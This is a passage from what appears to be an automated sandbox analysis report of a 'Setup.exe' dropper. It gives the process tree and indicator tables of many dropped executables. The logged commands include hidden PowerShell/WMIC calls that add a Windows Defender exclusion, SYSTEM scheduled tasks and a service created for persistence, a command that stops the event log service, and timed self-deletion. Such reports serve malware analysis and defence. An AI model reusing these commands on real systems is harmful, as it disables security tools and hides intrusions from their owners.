2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe

Suspicious use of SetWindowsHookEx 47 IoCs

pid	Process
1184	Setup.exe
1784	Setup.exe
4992	6AzFaABBWzIB3fzN1U16jtOf.exe
3164	yhHzUVDC2pAw9goJepU_qORY.exe
564	5XopSKg9PUSZohSIWN2v9xOT.exe
2972	Klk_ndJuZUINtD72UfY7IaBv.exe
3724	1vI2dSu9Otp3tPl9bmA85PJf.exe
2848	cJGyky9EhCckJumZf6fkM6G5.exe
4528	QwpLixYOI92BLmCZFEhE6Mbs.exe
4528	QwpLixYOI92BLmCZFEhE6Mbs.exe
200	Klk_ndJuZUINtD72UfY7IaBv.tmp
4468	RegAsm.exe
1032	Install.exe
3656	MSBuild.exe
1252	Install.exe
2124	MSBuild.exe
2636	goldenmusicalvariety32_64.exe
772	RegAsm.exe
5104	Install.exe
1492	Install.exe
1524	goldenmusicalvariety32_64.exe
3736	BitLockerToGo.exe
2060	cmd.exe
4824	67f535e337.exe
4824	67f535e337.exe
2212	b9fcde3053.exe
1744	firefox.exe
5756	BFCFBFBFBK.exe
5864	RegAsm.exe
6004	KFIJJJEBGC.exe
6040	RegAsm.exe
5032	firefox.exe
4044	Setup.exe
2672	Setup.exe
6036	av_cOAXWNrelQa039CGbm0A1.exe
4912	IRrr6YljmO8hEIxi45BS9F3G.exe
5448	4Iy1KUXaumS5KWIhCg2YizTi.exe
2364	sxM96ISlNbOtGCb6tmhTPqMM.exe
5448	4Iy1KUXaumS5KWIhCg2YizTi.exe
6048	7NybowgkTtFNZ6zV5tAShfiu.exe
1784	av_cOAXWNrelQa039CGbm0A1.tmp
1496	MSBuild.exe
2236	MSBuild.exe
3020	RegAsm.exe
2956	RegAsm.exe
1612	BitLockerToGo.exe
940	Setup.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1184 wrote to memory of 1916	1184	Setup.exe	88
PID 1184 wrote to memory of 1916	1184	Setup.exe	88
PID 1184 wrote to memory of 1916	1184	Setup.exe	88
PID 1184 wrote to memory of 4528	1184	Setup.exe	89
PID 1184 wrote to memory of 4528	1184	Setup.exe	89
PID 1184 wrote to memory of 4528	1184	Setup.exe	89
PID 1184 wrote to memory of 3724	1184	Setup.exe	90
PID 1184 wrote to memory of 3724	1184	Setup.exe	90
PID 1184 wrote to memory of 3724	1184	Setup.exe	90
PID 1184 wrote to memory of 2972	1184	Setup.exe	92
PID 1184 wrote to memory of 2972	1184	Setup.exe	92
PID 1184 wrote to memory of 2972	1184	Setup.exe	92
PID 1184 wrote to memory of 1096	1184	Setup.exe	95
PID 1184 wrote to memory of 1096	1184	Setup.exe	95
PID 1184 wrote to memory of 564	1184	Setup.exe	93
PID 1184 wrote to memory of 564	1184	Setup.exe	93
PID 1184 wrote to memory of 564	1184	Setup.exe	93
PID 1184 wrote to memory of 3164	1184	Setup.exe	91
PID 1184 wrote to memory of 3164	1184	Setup.exe	91
PID 1184 wrote to memory of 3164	1184	Setup.exe	91
PID 1184 wrote to memory of 3980	1184	Setup.exe	94
PID 1184 wrote to memory of 3980	1184	Setup.exe	94
PID 1184 wrote to memory of 2848	1184	Setup.exe	98
PID 1184 wrote to memory of 2848	1184	Setup.exe	98
PID 1184 wrote to memory of 2848	1184	Setup.exe	98
PID 1184 wrote to memory of 2324	1184	Setup.exe	96
PID 1184 wrote to memory of 2324	1184	Setup.exe	96
PID 1184 wrote to memory of 2324	1184	Setup.exe	96
PID 1184 wrote to memory of 4992	1184	Setup.exe	97
PID 1184 wrote to memory of 4992	1184	Setup.exe	97
PID 1184 wrote to memory of 4992	1184	Setup.exe	97
PID 2972 wrote to memory of 200	2972	Klk_ndJuZUINtD72UfY7IaBv.exe	99
PID 2972 wrote to memory of 200	2972	Klk_ndJuZUINtD72UfY7IaBv.exe	99
PID 2972 wrote to memory of 200	2972	Klk_ndJuZUINtD72UfY7IaBv.exe	99
PID 2848 wrote to memory of 4468	2848	cJGyky9EhCckJumZf6fkM6G5.exe	100
PID 2848 wrote to memory of 4468	2848	cJGyky9EhCckJumZf6fkM6G5.exe	100
PID 2848 wrote to memory of 4468	2848	cJGyky9EhCckJumZf6fkM6G5.exe	100
PID 2848 wrote to memory of 4468	2848	cJGyky9EhCckJumZf6fkM6G5.exe	100
PID 2848 wrote to memory of 4468	2848	cJGyky9EhCckJumZf6fkM6G5.exe	100
PID 2848 wrote to memory of 4468	2848	cJGyky9EhCckJumZf6fkM6G5.exe	100
PID 2848 wrote to memory of 4468	2848	cJGyky9EhCckJumZf6fkM6G5.exe	100
PID 2848 wrote to memory of 4468	2848	cJGyky9EhCckJumZf6fkM6G5.exe	100
PID 4992 wrote to memory of 1032	4992	6AzFaABBWzIB3fzN1U16jtOf.exe	101
PID 4992 wrote to memory of 1032	4992	6AzFaABBWzIB3fzN1U16jtOf.exe	101
PID 4992 wrote to memory of 1032	4992	6AzFaABBWzIB3fzN1U16jtOf.exe	101
PID 1916 wrote to memory of 240	1916	cFb2c7uKqYcOaECU8XsTAIef.exe	103
PID 1916 wrote to memory of 240	1916	cFb2c7uKqYcOaECU8XsTAIef.exe	103
PID 1916 wrote to memory of 240	1916	cFb2c7uKqYcOaECU8XsTAIef.exe	103
PID 3164 wrote to memory of 1252	3164	yhHzUVDC2pAw9goJepU_qORY.exe	102
PID 3164 wrote to memory of 1252	3164	yhHzUVDC2pAw9goJepU_qORY.exe	102
PID 3164 wrote to memory of 1252	3164	yhHzUVDC2pAw9goJepU_qORY.exe	102
PID 2324 wrote to memory of 3656	2324	vmr4hdyC4X94dgX9Bh3X3e0n.exe	104
PID 2324 wrote to memory of 3656	2324	vmr4hdyC4X94dgX9Bh3X3e0n.exe	104
PID 2324 wrote to memory of 3656	2324	vmr4hdyC4X94dgX9Bh3X3e0n.exe	104
PID 1916 wrote to memory of 1852	1916	cFb2c7uKqYcOaECU8XsTAIef.exe	105
PID 1916 wrote to memory of 1852	1916	cFb2c7uKqYcOaECU8XsTAIef.exe	105
PID 1916 wrote to memory of 1852	1916	cFb2c7uKqYcOaECU8XsTAIef.exe	105
PID 2324 wrote to memory of 3656	2324	vmr4hdyC4X94dgX9Bh3X3e0n.exe	104
PID 2324 wrote to memory of 3656	2324	vmr4hdyC4X94dgX9Bh3X3e0n.exe	104
PID 2324 wrote to memory of 3656	2324	vmr4hdyC4X94dgX9Bh3X3e0n.exe	104
PID 2324 wrote to memory of 3656	2324	vmr4hdyC4X94dgX9Bh3X3e0n.exe	104
PID 2324 wrote to memory of 3656	2324	vmr4hdyC4X94dgX9Bh3X3e0n.exe	104
PID 2324 wrote to memory of 3656	2324	vmr4hdyC4X94dgX9Bh3X3e0n.exe	104
PID 1916 wrote to memory of 3592	1916	cFb2c7uKqYcOaECU8XsTAIef.exe	106

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\archive.zip
1⤵
PID:2640

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3580

C:\Users\Admin\Desktop\Setup.exe
"C:\Users\Admin\Desktop\Setup.exe"
1⤵
- Modifies firewall policy service
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1184
- C:\Users\Admin\Documents\SimpleAdobe\cFb2c7uKqYcOaECU8XsTAIef.exe
  C:\Users\Admin\Documents\SimpleAdobe\cFb2c7uKqYcOaECU8XsTAIef.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1916
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:240
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:1852
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:3592
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:2124
  - - C:\ProgramData\BFCFBFBFBK.exe
      "C:\ProgramData\BFCFBFBFBK.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of SetWindowsHookEx
      PID:5756
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:5824
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Checks processor information in registry
        Suspicious use of SetWindowsHookEx
        
        PID:5864
  - - C:\ProgramData\KFIJJJEBGC.exe
      "C:\ProgramData\KFIJJJEBGC.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of SetWindowsHookEx
      PID:6004
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6040
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FHIDAKFIJJKJ" & exit
      4⤵
      PID:3912
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:3600
- C:\Users\Admin\Documents\SimpleAdobe\QwpLixYOI92BLmCZFEhE6Mbs.exe
  C:\Users\Admin\Documents\SimpleAdobe\QwpLixYOI92BLmCZFEhE6Mbs.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:4528
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\JJECAAEHCF.exe"
    3⤵
    PID:3076
  - - C:\Users\Admin\AppData\Local\Temp\JJECAAEHCF.exe
      "C:\Users\Admin\AppData\Local\Temp\JJECAAEHCF.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      PID:5056
    - - C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:4208
      - C:\Users\Admin\AppData\Local\Temp\1000006001\67f535e337.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000006001\67f535e337.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:4824
      - C:\Users\Admin\AppData\Local\Temp\1000011001\b9fcde3053.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000011001\b9fcde3053.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:2212
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        7⤵
        
        PID:4480
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:1744
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1464 -prefMapHandle 1476 -prefsLen 25751 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {48ad2d88-7ccf-416d-bddb-5c705a201fe8} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" gpu
        9⤵
        
        PID:4288
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2408 -parentBuildID 20240401114208 -prefsHandle 2400 -prefMapHandle 2396 -prefsLen 26671 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2295a223-894b-4451-ab2b-f5dd216ec283} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" socket
        9⤵
        
        PID:2080
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3264 -childID 1 -isForBrowser -prefsHandle 3256 -prefMapHandle 3252 -prefsLen 22698 -prefMapSize 244658 -jsInitHandle 976 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e20f165-eac5-4cf4-a691-87ca10f227cd} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" tab
        9⤵
        
        PID:1452
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4112 -childID 2 -isForBrowser -prefsHandle 4104 -prefMapHandle 4092 -prefsLen 31161 -prefMapSize 244658 -jsInitHandle 976 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2577d75e-42c8-4294-bcbb-59c22cee37af} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" tab
        9⤵
        
        PID:5080
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2748 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4656 -prefMapHandle 4832 -prefsLen 31161 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {74613018-6594-425f-8b1a-b94e0ccc0b9f} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" utility
        9⤵
        Checks processor information in registry
        
        PID:5320
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5488 -childID 3 -isForBrowser -prefsHandle 5480 -prefMapHandle 5476 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 976 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f6550c75-03fd-4f92-bc14-2d585aeab22d} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" tab
        9⤵
        
        PID:4448
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5620 -childID 4 -isForBrowser -prefsHandle 5628 -prefMapHandle 5632 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 976 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3b9f3ae5-fe4f-4e0f-b547-04573c1eb0d0} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" tab
        9⤵
        
        PID:4784
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5812 -childID 5 -isForBrowser -prefsHandle 5820 -prefMapHandle 5824 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 976 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e789692e-dab1-46a0-95dc-2a2a63144e19} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" tab
        9⤵
        
        PID:464
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\EGHCBKKKFH.exe"
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:2060
- C:\Users\Admin\Documents\SimpleAdobe\1vI2dSu9Otp3tPl9bmA85PJf.exe
  C:\Users\Admin\Documents\SimpleAdobe\1vI2dSu9Otp3tPl9bmA85PJf.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3724
- C:\Users\Admin\Documents\SimpleAdobe\yhHzUVDC2pAw9goJepU_qORY.exe
  C:\Users\Admin\Documents\SimpleAdobe\yhHzUVDC2pAw9goJepU_qORY.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3164
- - C:\Users\Admin\AppData\Local\Temp\7zSB1D8.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1252
  - - C:\Users\Admin\AppData\Local\Temp\7zSBF45.tmp\Install.exe
      .\Install.exe /wdcUdidEsSsd "385132" /S
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      Enumerates system info in registry
      Suspicious use of SetWindowsHookEx
      PID:5104
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:4740
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:2384
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:236
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4952
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "beIeSqxTUIgkrqSZzo" /SC once /ST 23:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSBF45.tmp\Install.exe\" tg /udfdidUwig 385132 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:4092
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5104 -s 828
        5⤵
        Program crash
        
        PID:2364
- C:\Users\Admin\Documents\SimpleAdobe\Klk_ndJuZUINtD72UfY7IaBv.exe
  C:\Users\Admin\Documents\SimpleAdobe\Klk_ndJuZUINtD72UfY7IaBv.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2972
- - C:\Users\Admin\AppData\Local\Temp\is-RORIG.tmp\Klk_ndJuZUINtD72UfY7IaBv.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-RORIG.tmp\Klk_ndJuZUINtD72UfY7IaBv.tmp" /SL5="$B003E,5207631,54272,C:\Users\Admin\Documents\SimpleAdobe\Klk_ndJuZUINtD72UfY7IaBv.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    PID:200
  - - C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe
      "C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe" -i
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:2636
  - - C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe
      "C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe" -s
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:1524
- C:\Users\Admin\Documents\SimpleAdobe\5XopSKg9PUSZohSIWN2v9xOT.exe
  C:\Users\Admin\Documents\SimpleAdobe\5XopSKg9PUSZohSIWN2v9xOT.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  PID:564
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:772
- C:\Users\Admin\Documents\SimpleAdobe\KAIgHVGHtDFBzfjGkrU7kU8s.exe
  C:\Users\Admin\Documents\SimpleAdobe\KAIgHVGHtDFBzfjGkrU7kU8s.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:3980
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:1620
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:1816
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:2384
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:2112
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:4288
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:4880
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:3416
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:3996
- C:\Users\Admin\Documents\SimpleAdobe\dz_LhQg5VnMy0wlI_6dK0bLe.exe
  C:\Users\Admin\Documents\SimpleAdobe\dz_LhQg5VnMy0wlI_6dK0bLe.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1096
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:3736
- C:\Users\Admin\Documents\SimpleAdobe\vmr4hdyC4X94dgX9Bh3X3e0n.exe
  C:\Users\Admin\Documents\SimpleAdobe\vmr4hdyC4X94dgX9Bh3X3e0n.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2324
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:3656
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JKECFCFBGDHI" & exit
      4⤵
      PID:5000
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:1984
- C:\Users\Admin\Documents\SimpleAdobe\6AzFaABBWzIB3fzN1U16jtOf.exe
  C:\Users\Admin\Documents\SimpleAdobe\6AzFaABBWzIB3fzN1U16jtOf.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4992
- - C:\Users\Admin\AppData\Local\Temp\7zSB1C8.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1032
  - - C:\Users\Admin\AppData\Local\Temp\7zSBE7A.tmp\Install.exe
      .\Install.exe /iVYHKdidh "525403" /S
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      Enumerates system info in registry
      Suspicious use of SetWindowsHookEx
      PID:1492
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:2232
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:4820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4208
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1496
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bIOEZkRAagKtMyjtNl" /SC once /ST 23:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSBE7A.tmp\Install.exe\" Ij /spoadidY 525403 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:4972
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 796
        5⤵
        Program crash
        
        PID:2284
